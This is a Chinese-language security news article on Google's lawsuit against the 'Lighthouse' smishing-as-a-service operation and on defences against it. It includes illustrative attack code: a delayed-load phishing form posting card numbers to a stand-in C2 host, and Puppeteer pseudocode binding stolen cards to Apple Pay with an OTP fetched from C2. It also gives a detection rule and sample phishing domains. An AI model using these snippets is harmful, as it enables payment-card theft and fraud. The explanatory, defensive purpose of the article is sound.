Google重拳出击“短信钓鱼三人组”:一场横跨中美、直击PhaaS产业链的法律与技术围剿

简介: 2025年11月,Google在美国起诉中国境内网络钓鱼平台“Lighthouse”,揭露其通过模块化“钓鱼即服务”(PhaaS)在全球120国作案超百万起。该团伙仿冒USPS等品牌,利用短信诱导用户泄露验证码,进而劫持移动支付。攻击高度自动化,依托中国云服务快速轮换域名,绕过传统防御。此案标志科技巨头开始跨境溯源反制,也警示国内面临同类威胁——仿顺丰、ETC的钓鱼已现踪迹。防御需个人警惕、企业防护与生态协同并重。

2025年11月12日,美国纽约南区联邦法院迎来一份不同寻常的诉状——科技巨头Google正式对一个代号为“Lighthouse”(灯塔)的中国境内网络钓鱼服务发起民事诉讼。这并非一次普通的品牌维权,而是一场针对所谓“Smishing Triad”(短信钓鱼三人组)的系统性打击行动。据KrebsOnSecurity独家披露,该团伙利用高度模块化的“钓鱼即服务”(Phishing-as-a-Service, PhaaS)平台,在全球120多个国家造成超百万受害者,其手法之娴熟、规模之庞大、组织之严密,已远超传统网络犯罪范畴。

这场诉讼不仅标志着大型科技公司开始以法律武器主动“溯源反制”境外网络黑产,更将中国境内的PhaaS生态首次置于国际聚光灯下。而在国内,这一事件也引发安全界对本土短信钓鱼威胁升级的深度反思——当“仿USPS短信”变成“仿顺丰快递通知”,我们是否已做好准备?

一、“灯塔”照向何方?揭秘Smishing Triad的运作流水线

根据Google提交的诉状,“Lighthouse”并非单一黑客团队,而是一个由五大功能小组构成的“企业化”犯罪联合体:

开发组:负责维护Lighthouse平台,提供600余种钓鱼模板,覆盖400多个知名品牌,包括Apple、Google、PayPal、摩根大通、富国银行,甚至美国邮政(USPS)和E-ZPass电子收费系统;

数据经纪组:批量采购或爬取用户手机号、姓名、地理位置等信息,用于精准投放;

短信投递组:通过虚拟运营商、灰色短信通道或SIM卡池(SIM Box)大规模发送伪装成官方通知的短信;

盗刷变现组:在获取支付卡信息及一次性验证码(OTP)后,迅速绑定至攻击者控制的Apple Pay或Google Pay钱包,并在7–10天内完成高价值商品套现;

运营支持组:在Telegram上开设客服频道,提供多语言技术支持、模板更新、甚至“新手教学视频”。

“他们不是散兵游勇,而是一家‘SaaS公司’,只不过卖的是犯罪工具。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“Lighthouse的客户只需支付月费,就能获得从建站、发信到洗钱的一站式服务——这正是PhaaS模式最危险的地方。”

典型的攻击流程如下:

用户收到一条看似来自“USPS”的短信:“您的包裹因地址不详被扣留,请点击链接支付$2.99重新派送”;

点击后跳转至一个高度仿真的USPS登录页(域名如 usps-delivery[.]online),要求输入信用卡信息;

提交后页面提示:“银行正在验证,请输入您刚收到的6位验证码”;

用户输入验证码——殊不知,此时攻击者正用该卡尝试在Apple设备上添加新支付方式,而验证码正是银行发送的授权码;

一旦绑定成功,攻击者即可在实体商店(如苹果专卖店、珠宝店)使用Apple Pay进行无卡交易。

整个过程平均耗时不足3分钟,且因利用了合法移动支付体系,初期极难被风控系统识别。

二、技术内核拆解:Lighthouse如何绕过传统防御?

要理解Lighthouse为何能长期肆虐,需深入其技术架构。安全研究人员发现,该平台具备三大“反侦察”特性:

1. 域名快速轮换 + CDN混淆

据网络安全公司Silent Push 2025年5月报告,Smishing Triad在任意8天窗口期内可激活约25,000个钓鱼域名。这些域名通常注册于隐私保护服务,并通过Cloudflare、Alibaba Cloud等CDN加速,使得IP地址与真实服务器分离。

# 示例:基于WHOIS和DNS历史的钓鱼域名聚类(简化版)

import whois

import dns.resolver

def is_suspicious_domain(domain):

try:

w = whois.whois(domain)

# 检查注册时间是否<7天

if (datetime.now() - w.creation_date).days < 7:

return True

# 检查NS记录是否指向廉价DNS服务商

ns_records = dns.resolver.resolve(domain, 'NS')

for ns in ns_records:

if 'cheapdns' in str(ns).lower():

return True

except Exception as e:

pass

return False

此类自动化检测虽有效,但面对每日数千新域名的生成速度,传统黑名单机制往往滞后。

2. 模板动态加载 + 品牌元素克隆

Lighthouse后台允许用户选择目标品牌(如“Chase Bank”),系统自动生成包含该品牌Logo、配色、字体甚至favicon的完整页面。Google在诉状中特别指出,其商标被非法嵌入至少1/4的模板中。

更隐蔽的是,部分模板采用“延迟加载”技术:初始HTML不含敏感关键词,待用户交互后再通过JavaScript注入支付表单。

<!-- 初始页面仅显示“Processing...” -->

<div id="loader">Processing your request...</div>

<script>

// 3秒后动态插入表单(规避静态扫描)

setTimeout(() => {

document.getElementById('loader').innerHTML = `

<form action="https://evil-c2[.]com/collect" method="POST">

<img src="https://legit-cdn[.]com/chase-logo.png" />

<input type="text" name="card_number" placeholder="Card Number" />

<input type="submit" value="Verify Payment" />

</form>

`;

}, 3000);

</script>

这种“行为触发式钓鱼”极大提升了绕过邮件网关和网页内容过滤器的成功率。

3. 移动钱包绑定自动化

最致命的一环在于OTP劫持后的自动绑定。攻击者利用Apple/Google提供的API(或模拟浏览器自动化工具如Puppeteer),在后台静默完成钱包添加。

// 伪代码:模拟Apple Pay卡绑定流程(需配合真实设备或模拟器)

const puppeteer = require('puppeteer');

(async () => {

const browser = await puppeteer.launch({ headless: true });

const page = await browser.newPage();

// 导航至Apple Wallet添加页面(需已登录iCloud)

await page.goto('https://wallet.apple.com/add-card');

// 自动填充从钓鱼页窃取的卡号、CVV、有效期

await page.type('#card-number', stolenCard.number);

await page.type('#cvv', stolenCard.cvv);

await page.select('#expiry-month', stolenCard.expMonth);

await page.select('#expiry-year', stolenCard.expYear);

// 等待银行发送OTP,再从C2服务器接收并填入

const otp = await fetchOTPFromC2();

await page.type('#otp-input', otp);

await page.click('#submit-button');

await browser.close();

})();

由于整个过程发生在用户授权的设备上(攻击者通过远程控制或二手设备获得),银行风控系统常误判为“正常用户行为”。

三、托管于中国云:法律追责的“灰色地带”

值得注意的是,Silent Push数据显示,Lighthouse所用钓鱼站点大量托管于两家中国云服务商:腾讯云(AS132203)与阿里云(AS45102)。尽管这些平台均有安全合规政策,但因钓鱼站点生命周期极短(平均存活<48小时),且常伪装成普通电商或博客,自动检测难度极大。

“这不是平台纵容,而是攻防不对称。”芦笛解释,“攻击者用自动化脚本批量部署,而平台依赖人工举报或模型识别,天然处于被动。”

Google此次诉讼的一大战略意图,正是试图通过美国法院的缺席判决(default judgment),获得具有法律效力的侵权认定,进而向中国云服务商施压:“若贵司继续为已被司法认定的犯罪基础设施提供服务,可能面临连带责任。”

这一策略在过往案例中已有先例。2023年,微软曾依据法院禁令,成功促使某东南亚IDC下架Emotet僵尸网络C2服务器。但在中国法律框架下,境外判决的执行力仍存争议。

四、从USPS到顺丰:国内威胁的镜像演进

尽管Lighthouse主要针对欧美用户,但其技术模式已在国内复现。2025年以来,国内多地出现仿冒“顺丰速运”“京东物流”“ETC中心”的短信钓鱼事件。例如:

“【顺丰】您的包裹含违禁品,请点击 sf-express-verify[.]cn 缴纳保证金”;

“【ETC】您的高速账户异常,需立即认证 etcservice-update[.]top”。

这些站点同样采用动态表单、品牌克隆,并诱导用户输入银行卡号及短信验证码。更令人担忧的是,部分团伙已开始尝试绑定支付宝“先享后付”或微信支付分,实现信用套现。

“国内用户对短信的信任度更高,且移动支付普及率全球领先,这反而成了攻击者的‘理想温床’。”芦笛警告,“我们监测到,有PhaaS平台已推出中文模板,专门针对淘宝、拼多多、美团等本土App。”

五、防御之道:从个体警惕到生态协同

面对如此精密的攻击,仅靠用户“提高警惕”远远不够。真正的防线需构建于三个层面:

1. 个人用户:切断“信任链”

绝不点击短信中的链接处理缴费、物流、账户问题。应手动打开官方App或浏览器输入官网地址;

启用双重验证(2FA)时避免使用短信,优先选择Authenticator应用或硬件密钥;

若已输入验证码,立即联系银行冻结卡片,并检查Apple Pay/Google Pay设备列表。

2. 企业侧:品牌防护前置化

注册核心品牌关键词的防御性域名(如 brand-security.com);

部署Brand Protection服务,实时监控暗网、Telegram、域名注册库中的仿冒线索;

在官网显著位置发布“我们绝不会通过短信索要验证码”的声明。

3. 安全社区:共享IOC,推动自动化阻断

公共互联网反网络钓鱼工作组建议,各机构应积极上报钓鱼URL、域名、IP、SSL证书指纹等IOC(Indicators of Compromise),并通过STIX/TAXII协议实现情报共享。

例如,以下YARA规则可用于检测Lighthouse典型页面特征:

rule Lighthouse_Phish_Template {

meta:

description = "Detects Lighthouse phishing page with OTP prompt"

strings:

$s1 = "Your bank has sent a verification code" nocase

$s2 = "Enter the 6-digit code below to complete" nocase

$s3 = /<input[^>]*name=["']otp["']/ nocase

$logo_google = "https://www.google.com/images/branding/googlelogo"

condition:

2 of ($s1, $s2, $s3) and $logo_google

}

此类规则可集成至邮件网关、EDR或Web代理中,实现毫秒级拦截。

六、结语:没有终点的攻防马拉松

Google的诉讼或许能暂时打散Lighthouse的Telegram频道,迫使其更名重启,但正如SecAlliance研究员Ford Merrill所言:“只要利润足够高,他们永远不会真正消失。”

真正的胜利不在于摧毁一个“灯塔”,而在于让每一座“灯塔”都难以点亮。这需要法律、技术、教育与国际合作的四重奏——在美国法院敲响法槌的同时,中国的云服务商、电信运营商、安全厂商与普通网民,也必须成为这场全球反钓鱼战役中不可或缺的一环。

毕竟,下一条仿冒短信,可能就发到你的手机上。而你,是否已准备好说“不”?

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
28天前
|
人工智能 供应链 安全
OpenAI“后门”失守:一次钓鱼攻击如何撬动AI巨头的第三方供应链防线
2025年,一封伪造OpenAI邮件通过第三方分析平台Mixpanel发起精准钓鱼攻击,窃取员工凭证,导致部分API用户元数据泄露。事件揭示AI生态中供应链安全的脆弱性,攻击者借“最小权限”漏洞横向移动,获取地理位置、设备信息等敏感数据,凸显第三方风险与身份认证短板。从SolarWinds到Okta,此类攻击已成常态。应对需构建零信任架构,推行最小权限、MFA、无密码登录及自动化第三方风险监控。安全非附加功能,而是信任基石——一次钓鱼即可动摇用户信心,预防远胜补救。
151 7
|
3天前
|
自然语言处理 API 数据安全/隐私保护
2026年OpenClaw(Clawdbot)部署保姆级指南+接入阿里云百炼API步骤流程
2026年OpenClaw(原Clawdbot/Moltbot)作为轻量化、高扩展性的AI助手框架,其核心价值在于通过对接各类大模型API实现多样化的智能任务处理。阿里云百炼作为国内领先的大模型服务平台,提供了丰富的模型选择、稳定的接口性能和企业级安全保障,将OpenClaw与阿里云百炼API集成,能让OpenClaw具备更强的自然语言理解、内容生成和任务执行能力。本文基于2026年最新版本实测,从环境准备、OpenClaw部署、阿里云百炼API配置到功能验证,提供包含完整代码命令的保姆级教程,零基础用户也能零失误完成配置。
196 10
|
27天前
|
人工智能 安全 网络安全
你的日历正在“出卖”你?新型钓鱼攻击借力日历订阅功能悄然渗透数百万设备
2025年末,日历订阅成网络安全新漏洞。攻击者利用ics日历同步机制,向全球用户推送钓鱼链接,绕过传统防护。伪装节日、赛事等诱骗订阅后,可长期发送恶意通知,甚至结合AI定制内容。中国用户亦面临风险,专家呼吁加强日历安全审查与防御体系。
110 5
|
24天前
|
JavaScript 安全 前端开发
谷歌重拳出击“钓鱼即服务”黑产:25名中国籍嫌犯被诉,短信钓鱼攻防战进入新阶段
Google起诉25名中国籍“John Doe”,揭露其运营的Lighthouse“钓鱼即服务”平台,一年内生成超20万仿冒网站,波及121国,窃取超1.15亿条信用卡信息。该平台提供傻瓜式钓鱼工具,降低犯罪门槛,攻击覆盖Google、USPS等400多家品牌。尽管诉讼难获刑事定罪,但旨在冻结资产、切断黑产链条。专家呼吁加强跨国协作与技术防御,共建反诈生态。
125 4
|
24天前
|
安全 JavaScript 前端开发
钓鱼攻击“隐身术”升级:Quantum Route Redirect让安全网关集体失明,M365成重灾区
2025年新型钓鱼工具QRR利用智能分流技术,伪装成“密码过期”邮件,绕过安全检测,精准攻击M365用户。其通过浏览器指纹识别真人与扫描器,实现“双轨响应”,并借助会话劫持横向渗透,形成闭环攻击。该工具已作为PhaaS服务公开售卖,具备反检测、多语言模板等企业级功能,威胁全球企业网络安全。
88 1
|
7天前
|
监控 安全 网络安全
8080 和 3128 端口的核心区别及使用场景
HTTP代理常用端口8080与3128各有侧重:8080多用于管理监控(如Web配置界面),易记但可能被防火墙拦截;3128为标准端口,稳定性高,主供客户端正常请求转发。端口可自定义,需据安全与性能需求合理选用。
|
区块链 算法 数据安全/隐私保护
带你读《区块链开发实战: 基于JavaScript的公链与DApp开发》之一:自己动手实现一个区块链系统
本书用三个部分讲解了区块链技术以及Asch的相关实践,第一部分讲解了区块链技术的基本概念,并用300行代码实现了一个最小的、可运行的区块链;第二部分分析Asch的源码,讲解Asch的实现原理;第三部分介绍了基于Asch的侧链技术的DApp开发实战。
|
24天前
|
安全 前端开发 定位技术
Google亮剑“灯塔”:一场法律与代码交织的PhaaS围剿战,中国安全界如何接招?
2025年,Google起诉PhaaS平台“Lighthouse”,揭露其提供仿冒登录页、反侦测技术等一站式钓鱼服务,标志网络犯罪进入工业化时代。此举凸显全球身份安全危机,警示中国需加强法律协作与全链条防御。
108 6
|
1天前
|
人工智能 运维 机器人
2026年部署OpenClaw(Clawdbot)及接入钉钉、QQ、企业微信、飞书等IM平台详细教程
OpenClaw(原Clawdbot)作为阿里云生态下高适配的AI自动化代理工具,2026年版本重点强化了多IM平台对接能力,可无缝集成QQ、企业微信、飞书、钉钉等主流办公协作工具,实现“AI指令跨平台执行、消息统一管控、自动化任务多端触达”。相较于传统对接方式,2026版OpenClaw将IM对接流程标准化、配置可视化,大幅降低企业级集成门槛。本文将从阿里云部署OpenClaw基础环境、多IM平台对接配置、功能验证、运维优化四大维度,给出超详细的实战教程,包含专属适配的代码命令与避坑技巧,覆盖从部署到多平台落地的全链路。
107 2